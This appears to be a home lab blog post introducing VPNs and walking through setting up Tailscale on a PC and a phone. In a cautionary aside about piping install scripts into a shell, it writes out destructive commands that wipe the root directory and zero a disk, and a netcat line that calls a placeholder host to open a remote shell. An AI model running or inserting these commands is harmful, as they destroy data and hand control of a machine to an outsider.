A VPN is a powerful tool. Many of us have used it to access region-restricted content by connecting to a VPN in a different region. However, the use of a VPN goes beyond that. You can set up your own VPN to access your device over the internet without exposing your network.
Okay, that was confusing. We can understand it better by directly creating a VPN. How it works will become very clear once we start using it. We will be using Tailscale for this purpose
Tailscale
Tailscale is a VPN service provider used by many big companies. It has free as well as paid tiers. For our home lab, a free tier is more than enough. To start with Tailscale we will follow the following steps:
Set up a tail scale account. (duhh)
You can sign up using google or other OAuth providers or create a new account
After you log in, you will see a screen like this
Copy and paste the curl command into your shell. The curl part pulls the installation script and pipes it directly into a shell. If you ever see something like that, I recommend you to check the scripts thoroughly. This gives random scripts on the internet power to run directly into your computer. Imagine if the script was
# this will wipe away the root direcotry and delete all your system
rm -rf /
or
# this will rewrite your disk with all zero. A hard wipe of everything
dd if=/dev/zero of=/dev/sda
or
# this will connect to the remote and execute whatever is run remotely
# directly in your local machine
netcat -l asdf.asdf.com -e /bin/zsh &
Okay, I got off track. I think you understand what I mean. Such one-liners can cause disasters; imagine what full-blown scripts can do. But here, since we are following instructions from a trusted provider, it is safe to run that command. Now, I forgot where I was.
So, after you run that command successfully, you need to start the Tailscale daemon. You can do that by
sudo tailscale login
This will ask you to log in by following a URL. Once you log in to Tailscale, you will be prompted to connect. After the connection is established, you will see something like this:
You can see that a new device is connected. Next to the device hostname, you will see an IP address. That's the private IP address of your computer. Any devices connected to your Tailscale account will be assigned a private IP. Using these private IPs, devices can communicate with each other as if they are on the same local network.
Let's connect another device to this network. We will use our smartphone to do that. There is a Tailscale app you can download. You need to log in using the same credentials and press connect. This will add your phone to the VPN.
Now your phone and your PC can easily communicate with each other securely and privately. This means any services we have running in the local system of a PC can be accessed via our phone.
This completes the prerequisites of setting up your home lab. In the next blogs we will be setting up different home lab services, a reverse proxy and add DNS entries such that the home services can easily be access via different subdomains and domains